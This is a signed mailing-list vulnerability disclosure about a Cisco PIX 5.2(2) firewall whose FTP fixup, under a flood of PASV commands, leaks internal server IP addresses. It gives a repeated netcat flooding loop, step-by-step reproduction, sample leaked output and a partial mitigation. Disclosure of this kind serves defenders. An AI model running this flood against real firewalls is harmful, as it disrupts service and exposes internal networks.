-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1



Hi,  Vulnerability in the Subject it's explained here...



Attached file:

- - Script used for DOS pasvDOS.sh

- - Log of the script PIXLOG.first_172_16.bz2 & PIXLOG.second_172_16.bz2

- - Log of debug debug_ftp.txt.bz2

Log of the Latest session against the second pix on which service network

is 192.168.3.0/24 is on:

http://naif.itapac.net/PIXLOG_latest_192_168.bz2

because it's too big for attach in a mlist.



====

PIX TESTED:

Cisco Secure PIX Firewall Version 5.2(2)



Compiled on Sun 24-Sep-00 18:59 by morlee



skifo-pix up 16 hours 55 mins



Hardware:   SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz

Flash i28F640J5 @ 0x300, 16MB

BIOS Flash AT29C257 @ 0xfffd8000, 32KB



0: ethernet0: address is 00d0.b790.5685, irq 11

1: ethernet1: address is 00e0.b601.cfbd, irq 15

2: ethernet2: address is 00e0.b601.cfbc, irq 10

3: ethernet3: address is 00e0.b601.cfbb, irq 9

4: ethernet4: address is 00e0.b601.cfba, irq 11

5: ethernet5: address is 00d0.b790.512e, irq 10



Licensed Features:

Failover:       Enabled

VPN-DES:        Enabled

VPN-3DES:       Disabled

Maximum Interfaces:     6

Cut-through Proxy:      Enabled

Guards:         Enabled

Websense:       Enabled

Throughput:     Unlimited

ISAKMP peers:   Unlimited



Cisco released 5.2(4) yesterday, and it's time for a 5.2(5) :(



I've tryed to fill  pix memory with the attached pasvDOS.sh shell script piped trought netcat but

i obtained other results...



then from cmd line:



 [~] $ (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14  15 16 17 18 19 20 21 22 23  24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh  | nc eagletmp 21)& )  ; done) >>PIXLOG&



but before starting the "PASV FLOOD" i start logging my ssh session, so we have log all FTP FIXUP DEBUG...



 [~] $ script debug_ftp.txt



The PIX start revelating me the Real ip of the server immediatelly after

it kick me off from ssh with the following error:



Local: Corrupted check bytes on input.



NOW it start replying to my PASV command with the REAL internal ip address of the server...



===== Normal Situation

227 Entering Passive Mode (xxx,xxx,xxx,xx,18,237)

===== Under this kind of dos, after 21th ftp session that flood pix with PASV

227 Entering Passive Mode (172,16,1,2,6,113)



After i change the PIX and network, on another pix with 5.2(2) and i could receive with

this dos:

227 Entering Passive Mode (192,168,3,2,99,37)

Et voila'...



Trying to reproduce this kind of dos/exploit it works only sometimes...

after a reload it usually works after that:



- - I start  (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14  15 16 17 18 19 20 21 22 23  24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh  | nc eagletmp 21)& )  ; done) >>PIXLOG&

- - I leave it running for some minutes

- - I kill all connection killing the "nc" process

- - Wait for 2/3 minutes

- - Restart with  (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14  15 16 17 18 19 20 21 22 23  24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh  | nc eagletmp 21)& )  ; done) >>PIXLOG&



but i cannot figure why.





I notice that using "fixup ftp strict 21" could block this kind of attack

and error in debug is :



get_cmd: ERR: command not terminated



but it's also true that with "fixup ftp strict 21" many ftp-client doesn't work with ftp server inside the pix...





p.s. all ppl now know that "mork" have to offer me a lunch ;)



Pietrosanti  Fabio (naif)

E-mail: naif@inet.it 

PGP Key (DSS) http://naif.itapac.net/naif.asc

 --

Free advertising: www.openbsd.org - Multiplatform Ultra-secure OS



-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.0.1 (GNU/Linux)

Comment: For info see http://www.gnupg.org

Filter: gpg4pine 4.1 (http://azzie.robotics.net)



iD8DBQE52bPQdK5I1NnlcMYRAjN7AKDTZSntnK6lmtFqq3r9WtWR6TJnIgCfQ8LN

MhtFpAc2KZMcrcOf82OAaJk=

=uso7

-----END PGP SIGNATURE-----